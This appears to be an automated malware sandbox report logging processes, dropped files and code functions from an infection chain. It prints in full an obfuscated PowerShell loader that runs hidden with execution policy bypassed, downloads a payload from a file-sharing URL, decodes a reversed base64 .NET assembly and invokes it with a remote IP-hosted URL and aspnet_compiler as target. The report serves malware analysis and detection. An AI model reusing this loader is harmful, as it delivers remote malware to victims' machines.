'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02DC9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

17_2_02DC9247

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07D933B3 push FFFFFF8Bh; retf	3_2_07D933BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07D93582 push FFFFFF8Bh; iretd	3_2_07D9358B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07D93549 push FFFFFF8Bh; iretd	3_2_07D93552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07D91431 push FFFFFF8Bh; iretd	3_2_07D9143A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040134A pushfd ; retf	13_2_00401353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004012F2 pushfd ; retf	13_2_004012F3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_3_05CB9C40 pushfd ; retf	17_3_05CB9C42
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_3_05CB9719 push eax; ret	17_3_05CB9725
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_3_05CBA53C pushfd ; retf	17_3_05CBA53E
Source: C:\Windows\explorer.exe	Code function: 18_2_001E1405 push esi; ret	18_2_001E1407
Source: C:\Windows\explorer.exe	Code function: 18_2_001E47A7 push esp; iretd	18_2_001E47A8
Source: C:\Windows\explorer.exe	Code function: 18_2_001E14D4 push esi; ret	18_2_001E14D6
Source: C:\Windows\explorer.exe	Code function: 18_2_001EA055 push es; iretd	18_2_001EA05D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0066967E push ds; retf	19_2_00669680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_006694E6 push edx; ret	19_2_006694E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_006638A7 push esp; iretd	19_2_006638A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030487CE push es; ret	20_2_03048A18
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_03048EEF push edi; ret	20_2_03048EF0
Source: C:\Windows\explorer.exe	Code function: 21_2_00711405 push esi; ret	21_2_00711407
Source: C:\Windows\explorer.exe	Code function: 21_2_007114D4 push esi; ret	21_2_007114D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00323417 push esp; iretd	22_2_00323418
Source: C:\Windows\explorer.exe	Code function: 26_2_007214D4 push esi; ret	26_2_007214D6
Source: C:\Windows\explorer.exe	Code function: 26_2_007245A7 push esp; iretd	26_2_007245A8
Source: C:\Windows\explorer.exe	Code function: 26_2_00721405 push esi; ret	26_2_00721407
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D53627 push esp; iretd	27_2_02D53628
Source: C:\Windows\explorer.exe	Code function: 28_2_00ABAC8D push esp; iretd	28_2_00ABAC95
Source: C:\Windows\explorer.exe	Code function: 28_2_00ABAAD2 push ebp; iretd	28_2_00ABAAD3
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB1405 push esi; ret	28_2_00AB1407
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB4817 push esp; iretd	28_2_00AB4818
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB14D4 push esi; ret	28_2_00AB14D6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\djvbaae			Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\djvbaae

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\djvbaae:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_03043862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

20_2_03043862

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
